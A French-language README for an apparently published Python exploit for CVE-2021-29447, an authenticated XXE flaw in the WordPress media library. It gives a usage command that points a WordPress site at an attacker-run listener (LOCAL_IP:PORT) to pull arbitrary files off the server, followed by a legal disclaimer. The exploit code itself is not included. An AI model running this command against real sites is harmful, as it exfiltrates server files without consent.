
Exploiter l'injection d'entités externes XML (XXE) dans la bibliothèque de médias de WordPress pour exfiltrer des fichiers.
Exploite l'injection d'entités externes XML (XXE) authentifiée de la médiathèque WordPress pour exfiltrer des fichiers.
Corrigé dans WordPress 5.7.1.
Des identifiants WordPress valides sont requis pour interagir avec la médiathèque.
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
Le script demandera le chemin du fichier et renverra le fichier demandé.
Inspiré du script de David Utón (M3n0sD0n4ld) ExploitDB.
L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de se conformer à toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou dommage causé par ce programme. Utilisez-le uniquement à des fins éducatives.
Ce script est publié sous la licence MIT.